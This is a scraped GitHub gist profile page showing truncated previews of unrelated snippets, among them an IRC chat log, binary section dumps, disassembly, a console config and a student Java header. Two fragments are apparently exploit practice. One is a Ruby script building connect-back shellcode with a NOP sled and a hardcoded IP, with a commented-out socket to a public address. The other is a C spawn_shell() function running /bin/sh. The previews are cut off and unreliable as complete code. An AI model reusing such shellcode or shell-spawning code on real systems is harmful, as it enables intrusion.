Skip to content

Instantly share code, notes, and snippets.

View iagox86's full-sized avatar

Ron Bowes iagox86

View GitHub Profile
12 [2012-06-07 15:44:02] < xorrbit> I can't run my AC at the same time as my dishwasher or microwave
11 [2012-06-07 15:44:07] < xorrbit> but my apartment is older
10 [2012-06-07 15:44:08] < xorrbit> ��\_(�<83><84>)_/��
9 [2012-06-07 15:44:18] < xorrbit> and my AC is freakin huge
8 [2012-06-07 15:44:19] <+ayecee> you probably have a bigger AC unit too
7 [2012-06-07 15:44:22] <+ayecee> there we go
Offset: 0x00000000
Size: 0x00000000
Data:
Length: 0x0 (0)
.interp
Offset: 0x00000134
Size: 0x00000013
Data:
require 'socket'
@@s = TCPSocket.new("localhost", 4445)
#@@s = TCPSocket.new('54.80.112.128', 1313)
SHELLCODE = ("\x90" * 30) +
"\x68" +
"\xce\xdc\xc4\x3b" + # <- IP Number
"\x5e\x66\x68" +
/**
* MyList
*
* ASSIGNMENT Assignment 2, Question 1
* @author Brittany Postninkoff, 07757816
* @version 2014 - 06 - 07
*
* PURPOSE: This is a class that builds a linked list.
*/
require 'pp'
CIPHER = ["",
"",
"",
"",
"",
"",
"",
"",
"",
<tab title="cygwin" icon="C:\cygwin64\Cygwin.ico" use_default_icon="0">
<console shell="c:\cygwin64\cygwin.bat" init_dir="" run_as_user="0" user=""/>
<cursor style="0" r="255" g="255" b="255"/>
<background type="0" r="0" g="0" b="0">
<image file="" relative="0" extend="0" position="0">
<tint opacity="0" r="0" g="0" b="0"/>
</image>
</background>
</tab>
{
"name": "strrchr example",
"labels": [
{
"name": "start",
"offset": "0x0"
},
{
"name": "loc1",
"offset": "0x17"
.raw:00000000 push ebp
.raw:00000001 mov ebp, esp
.raw:00000003 mov eax, [ebp+4]
.raw:00000006 test eax, eax
.raw:00000008 jnz short loc_17
.raw:0000000A push 57h
.raw:0000000C call near ptr 34h
.raw:00000011 xor eax, eax
.raw:00000013 pop ebp
.raw:00000014 retn 8
{
"name": "strrchr example",
"labels": [
{
"name": "start",
"offset": "0x0"
},
{
"name": "loc1",
"offset": "0x17"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void spawn_shell()
{
system("/bin/sh");
exit(0);
}